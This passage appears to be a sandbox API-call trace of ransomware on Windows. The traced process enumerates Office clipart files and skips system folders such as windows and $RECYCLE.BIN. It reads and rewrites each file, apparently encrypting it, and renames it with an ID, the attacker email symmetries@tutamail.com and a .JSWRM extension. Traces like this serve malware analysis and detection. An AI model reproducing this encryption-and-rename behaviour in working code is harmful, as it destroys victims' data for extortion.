[0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.515] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13746) returned 1 [0095.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x35b0) returned 0x24d210 [0095.516] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x35b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x35b0, lpOverlapped=0x0) returned 1 [0095.520] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.520] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x35b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x35b0, lpOverlapped=0x0) returned 1 [0095.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.520] CloseHandle (hObject=0x314) returned 1 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0095.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0095.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0095.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0095.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.520] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0095.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.521] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00168_.WMF", cAlternateFileName="")) returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2=".") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="..") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="...") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="windows") returned -1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="recovery") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="perflogs") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="documents and settings") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="system volume information") returned -1 [0095.521] lstrcmpiW (lpString1="SO00168_.WMF", lpString2="msocache") returned 1 [0095.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00168_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00168_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00168_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0095.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00168_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00168_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00168_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0095.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.522] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15150) returned 1 [0095.522] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b20) returned 0x24d210 [0095.522] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b20, lpOverlapped=0x0) returned 1 [0095.526] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.526] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b20, lpOverlapped=0x0) returned 1 [0095.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.526] CloseHandle (hObject=0x314) returned 1 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0095.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0095.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0095.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.527] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2242, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00170_.WMF", cAlternateFileName="")) returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2=".") returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="..") returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="...") returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="windows") returned -1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="recovery") returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="perflogs") returned 1 [0095.527] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="documents and settings") returned 1 [0095.528] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.528] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="system volume information") returned -1 [0095.528] lstrcmpiW (lpString1="SO00170_.WMF", lpString2="msocache") returned 1 [0095.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00170_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00170_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.529] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8770) returned 1 [0095.529] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2240) returned 0x205850 [0095.529] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2240, lpOverlapped=0x0) returned 1 [0095.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.533] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2240, lpOverlapped=0x0) returned 1 [0095.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.533] CloseHandle (hObject=0x314) returned 1 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0095.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0095.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0095.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.534] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f0e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00177_.WMF", cAlternateFileName="")) returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2=".") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="..") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="...") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="windows") returned -1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="recovery") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="perflogs") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="documents and settings") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="system volume information") returned -1 [0095.534] lstrcmpiW (lpString1="SO00177_.WMF", lpString2="msocache") returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00177_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00177_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00177_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00177_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00177_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00177_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.535] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36622) returned 1 [0095.535] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f00) returned 0x24d210 [0095.535] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8f00, lpOverlapped=0x0) returned 1 [0095.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.539] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8f00, lpOverlapped=0x0) returned 1 [0095.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.541] CloseHandle (hObject=0x314) returned 1 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 